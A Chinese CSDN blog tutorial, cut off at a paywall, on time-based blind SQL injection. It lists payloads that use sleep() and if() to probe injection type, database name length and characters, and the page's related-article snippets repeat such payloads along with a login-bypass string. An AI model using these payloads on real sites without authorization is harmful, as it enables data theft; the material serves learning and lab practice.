SQL盲注(延时注入)

最新推荐文章于 2023-02-04 22:54:47 发布
最新推荐文章于 2023-02-04 22:54:47 发布
阅读量1.1w 收藏 32
点赞数 6
分类专栏: Web安全 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/JKding123/article/details/88937680
版权

思路:
*判断是否存在注入,注入是字符型还是数字型
*猜解当前数据库名
*猜解数据库表名
*猜解字段名
*猜解数据
1判断注入类型

payload result
1’ and sleep(5) # 延迟
1 and sleep(5)# 没有延迟

存在字符型注入
2猜解当前数据库名
2.1猜解数据库名的长度:

payload result
1’ and if(length(database())=1,sleep(5),1) # 没有延迟
1’ and if(length(database())=2,sleep(5),1) # 没有延迟
1’ and if(length(database())=3,sleep(5),1) # 没有延迟
1’ and if(length(database())=4,sleep(5),1) # 延迟

说明数据库名长度为4个字符。
2.2采用二分法猜解数据库名:

payload result
1’ and if(ascii(substr(database(),1,1))>97,sleep(5),1) # 延迟
1’ and if(ascii(substr(database(),1,1))<100,sleep(5),1)# 没有延迟
1’ and if(ascii(substr(database(),1,1))>100,sleep(5),1) # 没有延迟

说明数据库的第一个字符为小写字母d(ASCII码:100)
重复上述步骤,就能猜解出数据库名。
3猜解数据库的表名
3.1先猜解数据库中表的数量:

最低0.47元/天 解锁文章
JKding123
关注
  • 6
    点赞
  • 32
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
SQL注入延时注入
m0_56578216的博客
08-23 724
延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒延时注入的关键是sleep函数和if语句,通过sleep函数判断语句的真假,。
sql注入延时注入
最新发布
weixin_45653478的博客
04-09 1383
攻击者提交一个对执行时间敏感的SQL语句,通过执行时间的长短来判断注入是否成功。id=1' and if(ascii(substr(database(),1,1))=115,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),5,1))=114,sleep(5),1)--+ #延时5秒。id=1' and if(ascii(substr(database(),1,1))>97,sleep(5),1)--+ #延时5秒。
SQL注入--延时注入
weixin_52351575的博客
10-13 778
的时候是没有任何延迟的,所以判定它的首字母的ascii码值是107.找出ascii码表对应的首字母是f。原理:在没有得到任何回显的情况下,只能通过延迟页面的跳转来进行数据库的核对。我们看到界面,首先在url栏进行GET传参,但是没有任何回显,界面没有变化。接着,我们利用ascii()的函数去找出数据库的第一个字母的ascii码值。的时候,界面没有任何延迟,于是判定数据库的长度是12个字节长。所以判定我们输入的sql代码得到了执行。于是,我们输入代码,来查询数据库的长度。改90的值,依次递增,最终得到代码。
13、SQL延时注入
songling515010475的专栏
05-22 702
1.如下图测试SQL注入,参数乱填确不起作业,但这不代表不存在注入。 2.因为分Boolean型注入,与时间型注入,这里是时间型注入。 3.利用if 和 sleep进入注入,这里的if相当于java里面的三目运算一样,第一位是条件,第二位是第一位成立则执行第二位,否则执行第三位,这里我判断库名长度,如果库名长度为12则休息10秒再返回结果 4.判断库名第一位是否是Ascii位数中的107 ,107 代码字母k,因为我这里之前做提目己经知道是K了,所以直接尝试107,达到了我要的..
SQL注入5之时间延迟注入
weixin_56218159的博客
05-28 502
免责声明 该文章仅用于信息防御技术的交流和学习,请勿用于其他用途; 在未得到网站授权前提下,禁止对政府、事业单位、企业或其他单位网站及系统进行渗透测试;技术是把双刃剑,请遵纪守法,做一名合格的白帽子安全专家,为国家的网络安全事业做出贡献 ...
sql检测的简单脚本.zip
03-10
5. **检测脚本**:压缩包中的"sql注入检测"可能是用于自动化检测SQL的脚本,它可能包含了一些探测技巧,如上述的异常响应和时间延迟法。使用这类脚本,开发者或安全人员可以快速扫描网站,找出可能存在的SQL注入...
SQL利用工具
11-15
SQLSQL Blind Injection)是一种常见的网络安全漏洞,攻击者通过发送特定的SQL查询到应用程序,根据应用程序对异常情况的响应来推断数据库中的信息。在这种情况下,我们讨论的是一款名为"BSQLInjector"的工具...
12 延时注入1
08-03
延迟注入是一种的手法,通过提交对执行时间铭感的函数 SQL 语句,来判断是否执行成功。其原理是,当条件语句正确时,执行时间会变得很长,而错误时执行时间很短。这种技术可以绕过主流注入工具的检测,如 SQLMAP...
结合手工注入编写一个SQL脚本——以SQLi-Labs less16为例.doc
07-09
结合手工注入编写一个SQL脚本——以SQLi-Labs less16为例 本文档主要讲解了如何结合手工注入编写一个SQL脚本,以SQLi-Labs less16为例。整个过程可以分为两部分:分析测试注入点和获取数据库名编写脚本。 ...
SQL攻击技术综述 1 0
08-04
例如,通过延迟注入延时注入)或时间,通过改变查询的执行时间来获取数据库中的单个字符信息。 - **权限提升**:一旦获取了足够的信息,攻击者可能尝试获取更高的权限,如执行系统命令、修改数据或完全控制...
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2563
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时与布尔的核心思想都是通过浏览器两种
SQL注入漏洞-05】延时注入靶场实战
cc
02-04 6459
布尔延时注入的相同点:都是通过浏览器页面两种不同的响应来推测输入条件的真假性布尔延时注入的不同点:布尔是在条件真假时页面会有不同的显示延时注入则是只能在响应时间上推测显示结果的真假延时注入的缺点:有时候网页响应慢并不是因为sleep语句起的效果,也可能是网络等外部因素的影响。同时时间成本很高。
webug--延时注入
gclome的博客
05-13 998
延时注入介绍 对于基于时间的,通过构造真or假判断条件的sql语句,且sql语句中根据需要联合使用sleep()函数一同向服务器发送请求,观察服务器响应结果是否会执行所设置时间的延迟响应,以此来判断所构造条件的真or假(若执行sleep延迟,则表示当前设置的判断条件为真);然后不断调整判断条件中的数值以逼近真实值,最终确定具体的数值大小or名称拼写。 延时注入我们一般不能从页面直接获取数据库信息,所用知识与第二关基本相同 if(exp,1,sleep(5))如果exp为真,返回1,否则返回sleep(5
延时注入 分析
Sky_Bird_的博客
05-26 783
什么是延时注入延时注入其实也就是利用响应时长,发生延迟,从而判断返回值是否正确,当然最麻烦的是页面不论报不报错,都不会返回错误。 延时注入就是利用sleep()函数通过if语句判断所写的语句真假,如果为真返回我们想要的东西(例如:数据库的长度,数据库的名字等)如果我们写的东西不符合则会利用sleep()函数让服务器休眠。 固定的理解sleep(x) 函数的意义是关键,就是个自行设定如果判断成功那么就会延迟x秒 可能用到的函数 length()、substr()、ascii()、if()、sleep
延时注入得用法
ikzzy的博客
01-04 1110
今天我们主要讲一下延时注入,将用sql labs less5来演示。其实这个用法跟布尔差不多,等下演示起来你们就知道了。延时注入又称时间,也是的一种。通过构造延时注入语句后,浏览器页面的响应时间来判断正确的数据。 延时注入的应用场景是,在我们输入and 1或者and 0的时候,页面的返回无变化,这个时候可以通过and sleep(5)来判断一下页面的响应时间,相应时间在五秒多一点的话,说明此处可以使用延时注入。 咱们先讲一下延时注入将会用到得几个函数,length()、substr()、asc
一次手工和工具的延时注入(时间注入
qq_42097777的博客
03-29 7238
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 ##利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 1,判断当前库名的长度 and if (length(database())=8,0,sleep(5))#0 结果=8时网页没睡眠,可以判断当前库名有8个字符 2,猜库名 and if (ascii(substr(database(),1,1)...
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4796
1.概念 1.延时注入:当进行的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
sleepsql注入原理
07-27
SQL注入是一种常见的网络安全漏洞,攻击者可以通过在用户输入的数据中插入恶意的SQL语句来实现对数据库的非授权访问。 是一种特殊的SQL注入技术,它在攻击过程中无法直接获取到数据库返回的具体信息,但通过不断地进行布尔或时间来推断出数据的一些特征。 在进行时,攻击者通常会使用布尔或时间的方法来逐渐推断出数据库中的信息。布尔是通过构造恶意的SQL语句,利用数据库的布尔逻辑判断条件来判断某个条件是否成立,从而推断出数据的一些特征。时间则是通过构造恶意的SQL语句,利用数据库的延时函数来判断某个条件是否成立,从而推断出数据的一些特征。 例如,在一个登录功能中存在SQL注入漏洞的情况下,攻击者可以构造恶意的输入来绕过登录验证,比如输入 `' OR '1'='1';--`,这会导致SQL语句变成类似 `SELECT * FROM users WHERE username='' OR '1'='1';--' AND password=''` 的形式,其中 `' OR '1'='1'` 的条件永远为真,绕过了用户名和密码的验证。 这就是SQL注入的基本原理,攻击者通过构造恶意的输入来篡改原有的SQL语句,从而获取数据库中的信息或实现其他非授权操作。为了防止SQL注入攻击,开发者需要对用户输入进行严格的验证和过滤,使用参数化查询或预编译语句来防止恶意SQL注入的发生。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值